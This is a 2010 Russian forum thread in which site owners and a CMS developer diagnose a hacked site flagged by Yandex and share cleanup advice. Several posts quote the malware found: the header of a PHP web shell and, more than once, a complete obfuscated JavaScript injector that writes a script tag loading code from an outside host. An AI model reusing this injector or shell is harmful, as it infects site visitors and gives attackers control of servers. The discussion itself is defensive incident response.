ower_xz 117 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Пришло от yandex письмо, что на сайте вредоносный код... Сам сколько ни лазил по сайту, касперский ничего не показал. Потом запустил автопроверку и нашел два "подарочка" - 1276961698_fr199.php и 1237943695_4.php. Код абсолютно одинаковый в обоих файлах. <?php # Web Shell by oRb $auth_pass = ""; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e", и так далее... Оба файла были в подпапках uploads с той лишь разницей, что один был в папке files, а другой в папке уменьшенных копий картинок за март 2009 года. Кому интересна инфа об этом шелле, можете почитать тут: http://forum.xaknet.ru/thread12254.html Пароли на всякий случай поменял, да и заплатки все стояли, но как-то все-таки залили... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Речь случаем не о сайте edengard идет? Если да, то я кажется знаю причину, т.к. недавно решал такой же вопрос с другим сайтом. Во первых вирусы идут с рекламы а не с шелов, бот яндекса видит страницу а не содержания вашего сайта. Во вторых у вас у обоих одна и та же реклама и стоит одна и та же сомнительная PHP партнерка где предлагается скачать на высокой скорости непонятно что. Я видел код этой партнерки, в админпанели нет проверок доступа, разрешен свободный запуск с записью. Сами файлы которые скачиваются в этих партнерках блокируются антивирусами. В ваших шаблонах также множество сторонних JS файлов, например: <script LANGUAGE="JavaScript"> <!-- function Decode(){var temp="",i,c=0,out="";var str="60!110!111!105!110!100!101!120!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!99!104!97!114!115!101!116!61!34!119!105!110!100!111!119!115!45!49!50!53!49!34!32!115!114!99!61!34!104!116!116!112!58!47!47!117!110!100!101!114!45!99!108!105!99!107!46!114!117!47!106!115!47!105!102!46!112!104!112!63!105!100!61!51!50!50!51!34!62!60!47!115!99!114!105!112!116!62!60!47!110!111!105!110!100!101!120!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} //--> </SCRIPT><script LANGUAGE="JavaScript"> <!-- Decode(); //--> </SCRIPT>[/code] и т.д. Удалите все эти партнерки с сайта полностью, восстановите оригинальные файлы скрипта, также из шаблонов уберите весь лишний JS код, после этого еще раз смените пароли. Также теперь проверяйте чтобы небыло в настройках разрешения на загрузку PHP, и в настройках групп нет такого разрешения Цитата Ссылка на сообщение Поделиться на других сайтах
ower_xz 117 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Автор Да, этот сайт... Партнёрку эту я снял. А вот по поводу скрипта - я его не нашел. Шаблон пересмотрел полностью, но такого скрипта там нет. Я уже подумал, что прописался где-то после последних событий. Да и изначально в файлах используемого шаблона никаких скриптов не было. В коде страниц самого сайта я его тоже не вижу. Страницу не подскажете, где вы нашли этот код? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 ower_xz, прямо на главной я его вижу. в самом начале страницы Цитата Ссылка на сообщение Поделиться на других сайтах
llbarmenll 18 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 <script LANGUAGE="JavaScript"> <!-- function Decode(){var temp="",i,c=0,out="";var str="60!110!111!105!110!100!101!120!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!99!104!97!114!115!101!116!61!34!119!105!110!100!111!119!115!45!49!50!53!49!34!32!115!114!99!61!34!104!116!116!112!58!47!47!117!110!100!101!114!45!99!108!105!99!107!46!114!117!47!106!115!47!105!102!46!112!104!112!63!105!100!61!51!50!50!51!34!62!60!47!115!99!114!105!112!116!62!60!47!110!111!105!110!100!101!120!62!";l=str.length;while(c<=str.length-1){while(str.charAt©!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} //--> </SCRIPT><script LANGUAGE="JavaScript"> <!-- Decode(); //--> </SCRIPT> Скорее всего в index.php запихали. Цитата Ссылка на сообщение Поделиться на других сайтах
ower_xz 117 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Автор Да, точно... Я через Firefox не видел, пока кэш не очистил. Только в Opera и IE видно было. Пришлось файлы перезалить, в самом шаблоне кода никакого не было. Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Народ! Та же проблема-были всованы файлы users.php в папках editor,modules и аякс .Так же в папке files файл 1276748747_login.php . Но Яндекс все равно орет что код вредоносный есть! друзья-гляньте сайт Ru-video.net ,уже всю рекламу снял и все равно вирус где то сидит!!! Буду очень признателен!!! :unsure: Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 hrompic, нет у вас ничего на сайте. Запросите информацию с яндекса на что он ругается. Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Запросил,но они только через неделю ответят как обычно.... Скажите а вот эти файлы оригинальные? /engine/modules/cat_menu.php и /engine/modules/cat_menu.functions.php А то в лицензионном архиве их нет а на сервере откуда то лежат,и причем стоян не ваши копирайты а : Categories Menu version 2.0 Beta ----------------------------------------------------- http://www.ikeep.ws/ ----------------------------------------------------- Copyright © 2009, 2010 Chrono ===================================================== Данный код защищен авторскими правами ===================================================== Файл: cat_menu.php ----------------------------------------------------- Назначение: Вывод меню категорий Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Скажите а вот эти файлы оригинальные? /engine/modules/cat_menu.php и /engine/modules/cat_menu.functions.php нет, это сторонний модуль Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Скажите а вот эти файлы оригинальные? /engine/modules/cat_menu.php и /engine/modules/cat_menu.functions.php нет, это сторонний модуль А вот этот ? Его в стандартном дистрибутиве нету хотя стоят ваши копирайты: engine/modules/c_navigation.php Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 А вот этот ? Его в стандартном дистрибутиве нету хотя стоят ваши копирайты: engine/modules/c_navigation.php это осталось от старой версии скрипта, в новых версиях его можно удалить Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Речь случаем не о сайте edengard идет? Если да, то я кажется знаю причину, т.к. недавно решал такой же вопрос с другим сайтом. Во первых вирусы идут с рекламы а не с шелов, бот яндекса видит страницу а не содержания вашего сайта. Во вторых у вас у обоих одна и та же реклама и стоит одна и та же сомнительная PHP партнерка где предлагается скачать на высокой скорости непонятно что. Я видел код этой партнерки, в админпанели нет проверок доступа, разрешен свободный запуск с записью. Сами файлы которые скачиваются в этих партнерках блокируются антивирусами. В ваших шаблонах также множество сторонних JS файлов, например: <script LANGUAGE="JavaScript"> <!-- function Decode(){var temp="",i,c=0,out="";var str="60!110!111!105!110!100!101!120!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!99!104!97!114!115!101!116!61!34!119!105!110!100!111!119!115!45!49!50!53!49!34!32!115!114!99!61!34!104!116!116!112!58!47!47!117!110!100!101!114!45!99!108!105!99!107!46!114!117!47!106!115!47!105!102!46!112!104!112!63!105!100!61!51!50!50!51!34!62!60!47!115!99!114!105!112!116!62!60!47!110!111!105!110!100!101!120!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} //--> </SCRIPT><script LANGUAGE="JavaScript"> <!-- Decode(); //--> </SCRIPT> и т.д. Удалите все эти партнерки с сайта полностью, восстановите оригинальные файлы скрипта, также из шаблонов уберите весь лишний JS код, после этого еще раз смените пароли. Также теперь проверяйте чтобы небыло в настройках разрешения на загрузку PHP, и в настройках групп нет такого разрешения А какие именно партнерки стояли на сайте? Я имею ввиду которые СКАЧАТь НА БОЛЬШОЙ СКОРОСТИ... Цитата Ссылка на сообщение Поделиться на других сайтах
ower_xz 117 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Автор А какие именно партнерки стояли на сайте? Я имею ввиду которые СКАЧАТь НА БОЛЬШОЙ СКОРОСТИ... bitcash.ru Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 А какие именно партнерки стояли на сайте? Я имею ввиду которые СКАЧАТь НА БОЛЬШОЙ СКОРОСТИ... bitcash.ru Вы думаете что это от них? Как лучше защитить свои сайты от заливки чужих файлов? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 Вы думаете что это от них? что у вас тоже эта реклама стояла?Как лучше защитить свои сайты от заливки чужих файлов? удалить все сторонние файлы с сервера, установить оригинальные файлы скрипта, убедится что стоят все вышедшие патчи безопасности Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 1.Да,тоже их реклама была,но я не верю что это они виноваты. 2.Так у меня все патчи стояли и обновлялся постоянно и вот все равно напакостили.Кстати заменил все файлы сайта на оригинальные и Яндекс наконец соизволил убрать пометку зараженности сайта! Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 081 Опубликовано: 22 июня 2010 Рассказать Опубликовано: 22 июня 2010 1.Да,тоже их реклама была,но я не верю что это они виноваты. я кстати не говорю, что они напрямую виноваты. В их коде я лишь увидел отсутствие проверки доступа, точнее проверка есть, но проводится не корректно и любой может получить доступ к администрованию и записи. Это могут знать и злоумышленники и пользоваться. Цитата Ссылка на сообщение Поделиться на других сайтах
ower_xz 117 Опубликовано: 23 июня 2010 Рассказать Опубликовано: 23 июня 2010 Автор Вы думаете что это от них? Больше вариантов лично я не вижу и склонен согласиться с celsoft. Эти партнерки довольно "мутные" и админы не особо заботятся о безопасности своих кодов. А многие просто находят где-то в сети файлы этих скриптов и готово - вот тебе партнерка. Сами сайты, используемые для скачивания файлов, очень часто оказываются зараженными (в том числе и скачиваемые файлы, что не есть хорошо для пользователей) и если другие антивирусы часто помалкивают, то касперский отслеживает их на раз. Других сторонних кодов у меня лично не было. Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 23 июня 2010 Рассказать Опубликовано: 23 июня 2010 некоторые партнерки, в частности речь идет об adskape.ru, позволяют рекламировать у себя загрузки и псевдо антивирусы. так что рассчитывать их на честность и порядочность не стоит, им лишь бы бабло с рекламодателей снять, а то что рекламируется палево им не важно. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.